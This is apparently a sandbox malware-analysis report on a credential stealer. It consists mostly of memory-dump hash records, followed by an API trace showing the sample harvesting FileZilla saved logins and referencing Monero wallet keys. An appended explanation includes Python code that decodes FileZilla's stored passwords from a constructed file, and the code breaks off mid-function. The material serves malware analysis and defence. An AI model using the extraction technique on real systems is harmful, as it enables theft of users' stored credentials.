                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: same dump files and IDA snapshot file as the preceding record
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                            • Instruction ID: 538dc0fd193b3b8077747d28c0277fa4a5f4e5c70c30bd31ae7e9062b9a0e184
                            • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                            • Instruction Fuzzy Hash: 0EB18172E083515BD308CF25C89176BF7E2EFC8310F1AC93EE89997291D774E9459A82
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: same dump files and IDA snapshot file as the preceding record
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                            • Instruction ID: 6dcd4804749c9bffeadfbbf39a56f7f651dbde5e806cf1ac585abb7d67a8ff0b
                            • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                            • Instruction Fuzzy Hash: 39B18172E083119BD308CF25C89175BF7E2EFC8310F1AC93EE89997291D778D9459A82
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: same dump files and IDA snapshot file as the preceding record
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                            • Instruction ID: 79fe0f95f937d92dac82c730eece9608fbd288c53b0b4d8641720a06d0639399
                            • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                            • Instruction Fuzzy Hash: D8B10771E097118FD706EE3DC491229F7E1AFE6280F51C72EE895B7662EB31E8819740
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: same dump files and IDA snapshot file as the preceding record
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                            • Instruction ID: adcc6de1ce1b087674b1a05c4d2a3a67d7c5c26e8ef50a2285f63faac71ac0a2
                            • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                            • Instruction Fuzzy Hash: FA91A1F1F002158BEF55CE6CDC80BBAB7A1BF56310F198568E918AB282D331DD45E7A1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                            • Instruction ID: ee4eba2417adfe5669bd360ef0de1a175b39a5c66c6897bedc390457abc77225
                            • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                            • Instruction Fuzzy Hash: C1B16A32A146089FD715CF29C48ABA47BE0FF45364F29865CE999CF2A2C375D981DF40
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                            • Instruction ID: 7baa400dba3b68e30ceed1a8b1c7f79ddad409caecd50980ff22c31dd05f1f2e
                            • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                            • Instruction Fuzzy Hash: 8FC14A75A0471A8FC715DF28C08045AB7F2FF88350F258A6DE8999B721D731E996CF81
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                            • Instruction ID: 5632d2dccc3d1214ce9dc1b8bf21a3cc184f37b43544838510fe9d5e9c6c5925
                            • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                            • Instruction Fuzzy Hash: B29147319287906AFB169B3CCC417BAB794FFE6350F24C31AF988724A2FB7585859344
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                            • Instruction ID: 0e4d8938638ba0796c1627c8ee250e122eff2fd10ddef58d069e312f7456210d
                            • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                            • Instruction Fuzzy Hash: 18A110B2D10A19CBEB19CF55CCC1A9ABBB1FB59324F14C62AD41AE77A0D334A944CF50
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                            • Instruction ID: 793ead59c4046704cba45c55be720577ca36c72b8e524aca5f890810c841deb7
                            • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                            • Instruction Fuzzy Hash: F9A17F72E087119BD308CF25C89075BF7E2EFC8710F1ACA3EA89997254D774E9419B82
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7085b3e61ddfd52d79303d8a37a29f5dee6b2c788961dda613cf79735c14630e
                            • Instruction ID: 5dbe4326eb6fa2df61131a8e51bcbbb1d0f594662eb40026f86ce6bbf208f255
                            • Opcode Fuzzy Hash: 7085b3e61ddfd52d79303d8a37a29f5dee6b2c788961dda613cf79735c14630e
                            • Instruction Fuzzy Hash: CE6144B3A182249FE300AA2DDC85777BBD9EBD8660F1B453DEA84D3744E9355C0182D6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a812e8df54486056e9ef6044383a29586fc02003f20ac58a5971bb2c62a41242
                            • Instruction ID: 7f506ffc9461a29769ad34bff0cd9487d90361d977db85024c5d74be57f010c4
                            • Opcode Fuzzy Hash: a812e8df54486056e9ef6044383a29586fc02003f20ac58a5971bb2c62a41242
                            • Instruction Fuzzy Hash: 345125F3E182005BF3085E1DDC4577AF7DAEB90720F1A463EEA84D7784E979A8014696
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9b7ea70e3226a0c35b79479a9023d6617de6475701e9e5c84314247f4c0cad3d
                            • Instruction ID: ea829463a005964165cd165bb75d54ce1b83c3bdd212b28f40be26c7b5d9b0b4
                            • Opcode Fuzzy Hash: 9b7ea70e3226a0c35b79479a9023d6617de6475701e9e5c84314247f4c0cad3d
                            • Instruction Fuzzy Hash: 545156F3E186009FE3406A2DDC8576ABBD9EFD4720F1A063DD79493784E97898008287
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 620f3c9c423bf357cf98f9b7a4b20562f218dd6f7a91c56e558ce4a51ad102af
                            • Instruction ID: 52aebf250a0e86ae6423442a93536edb56ba06e4ea98e0dfa54ef17992a99250
                            • Opcode Fuzzy Hash: 620f3c9c423bf357cf98f9b7a4b20562f218dd6f7a91c56e558ce4a51ad102af
                            • Instruction Fuzzy Hash: A151C0B3A083149FE3046F29DC4577ABBE5EB94320F16493DE6C8D7784E6399840CB96
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 906aff5897eb582aad7a165f7c49129252dc0c952cbcb2d19ac26a6e8b939aba
                            • Instruction ID: 90232ef890a61098b2854eaf897b7913409085eebeb69966d4855fb9c8187a72
                            • Opcode Fuzzy Hash: 906aff5897eb582aad7a165f7c49129252dc0c952cbcb2d19ac26a6e8b939aba
                            • Instruction Fuzzy Hash: 064155F3A081044BE308AE28EC89B3AB3D5EB14320F16063DEA84D3784E53A590587C3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                            • Instruction ID: 5bfd8df8c255a973dfeba5cb9c41216ef6478268e5871cb5171fce3f3197b829
                            • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                            • Instruction Fuzzy Hash: 4E513BA2E09BD585C7058B7944502EEBFB21FE6210F1E829EC49C5F383C3759689D3E5
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 07f7f11a1f98477b77591fc7671da17ca2de9059e281c8efd95e39888d01c100
                            • Instruction ID: 6a1311e9b898199763e58b3a3968ee56aea3cde098b70b9e473040051379150e
                            • Opcode Fuzzy Hash: 07f7f11a1f98477b77591fc7671da17ca2de9059e281c8efd95e39888d01c100
                            • Instruction Fuzzy Hash: 3031BEF3F046141BF304896AED947A7B68BD7D4321F2B85398E88977C5E8BE5C0502D1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: edeacf859751e83f70a714f0cc7f74e339a05ce29dccfdfc8e4cdc8c7e19681f
                            • Instruction ID: e354a4a83ed9aefffe0a8d5a538665341f6fb2734cc6e66a3bb2f50ef4c20a9e
                            • Opcode Fuzzy Hash: edeacf859751e83f70a714f0cc7f74e339a05ce29dccfdfc8e4cdc8c7e19681f
                            • Instruction Fuzzy Hash: 4D2105F3E0921447F354A97AEC85766B2869BD0720F2F823D8F59677C0EC7D58058286
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                            • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                            • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                            • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F48F9B
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F3A13C
                              • Part of subcall function 00F3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F3A161
                              • Part of subcall function 00F3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F3A181
                              • Part of subcall function 00F3A110: ReadFile.KERNEL32(000000FF,?,00000000,00F3148F,00000000), ref: 00F3A1AA
                              • Part of subcall function 00F3A110: LocalFree.KERNEL32(00F3148F), ref: 00F3A1E0
                              • Part of subcall function 00F3A110: CloseHandle.KERNEL32(000000FF), ref: 00F3A1EA
                              • Part of subcall function 00F48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F48FE2
                            • GetProcessHeap.KERNEL32(00000000,000F423F,00F50DBF,00F50DBE,00F50DBB,00F50DBA), ref: 00F404C2
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F404C9
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00F404E5
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F404F3
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 00F4052F
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F4053D
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00F40579
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F40587
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00F405C3
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F405D5
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F40662
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F4067A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F40692
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F406AA
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00F406C2
                            • lstrcat.KERNEL32(?,profile: null), ref: 00F406D1
                            • lstrcat.KERNEL32(?,url: ), ref: 00F406E0
                            • lstrcat.KERNEL32(?,00000000), ref: 00F406F3
                            • lstrcat.KERNEL32(?,00F51770), ref: 00F40702
                            • lstrcat.KERNEL32(?,00000000), ref: 00F40715
                            • lstrcat.KERNEL32(?,00F51774), ref: 00F40724
                            • lstrcat.KERNEL32(?,login: ), ref: 00F40733
                            • lstrcat.KERNEL32(?,00000000), ref: 00F40746
                            • lstrcat.KERNEL32(?,00F51780), ref: 00F40755
                            • lstrcat.KERNEL32(?,password: ), ref: 00F40764
                            • lstrcat.KERNEL32(?,00000000), ref: 00F40777
                            • lstrcat.KERNEL32(?,00F51790), ref: 00F40786
                            • lstrcat.KERNEL32(?,00F51794), ref: 00F40795
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F407EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: 9f18f33b242f147a6df75371b1761ecf0ca653336566f934811fb2e32fe7d9a3
                            • Instruction ID: 50c2606c82d5f377c4ccf0aaf7f041d3eb3a920b3d34584cab9c02c2dc360dac
                            • Opcode Fuzzy Hash: 9f18f33b242f147a6df75371b1761ecf0ca653336566f934811fb2e32fe7d9a3
                            • Instruction Fuzzy Hash: FAD13171D40108ABDB14EBF4DD9AEEE7B39BF54301F008554FA02A6096DF38BA09DB61
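The API and string list above reconstructs a FileZilla credential-harvesting routine: the subcall at 00F3A110 reads a whole file into a LocalAlloc(LPTR) buffer (CreateFileA with GENERIC_READ / FILE_SHARE_READ / OPEN_EXISTING, GetFileSizeEx, ReadFile, LocalFree, CloseHandle), the target is `\AppData\Roaming\FileZilla\recentservers.xml`, StrStrA locates `<Host>`, `<Port>`, `<User>` and `<Pass encoding="base64">`, and an lstrcat chain assembles a record from the literals `browser: FileZilla`, `profile: null`, `url: `, `login: ` and `password: `. The following is an added example, not code from the sample or from FileZilla: a Python reimplementation of that extraction over a constructed recentservers.xml, showing that the base64 "encoding" offers no protection (one decode call recovers the password), together with a small defensive check that counts how many entries in such a file hold a recoverable password. The separators the sample inserts between host and port and between fields are assumptions (':' and a newline); the listing only shows their addresses (00F51770 and so on), not their contents.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample in the layout of FileZilla's recentservers.xml (not a real capture).
# The second entry has no <Pass>, which is what a key-file or interactive logon leaves behind.
SAMPLE_RECENTSERVERS_XML = """<FileZilla3 version="3.66.0" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>backup</User>
      <Logontype>3</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def extract_filezilla_servers(xml_text: str) -> list[dict]:
    """Return one dict per <Server> with host, port, user and the decoded password.

    This does with a real XML parser what the analysed routine does with StrStrA:
    pull the text of <Host>, <Port>, <User> and <Pass encoding="base64">.
    Entries without a stored password yield password=None.
    """
    root = ET.fromstring(xml_text)
    servers = []
    for srv in root.iter("Server"):
        pass_el = srv.find("Pass")
        password = None
        if pass_el is not None and pass_el.text:
            if pass_el.get("encoding") == "base64":
                # base64 is an encoding, not encryption: one call recovers the secret
                password = base64.b64decode(pass_el.text).decode("utf-8", "replace")
            else:
                password = pass_el.text
        servers.append({
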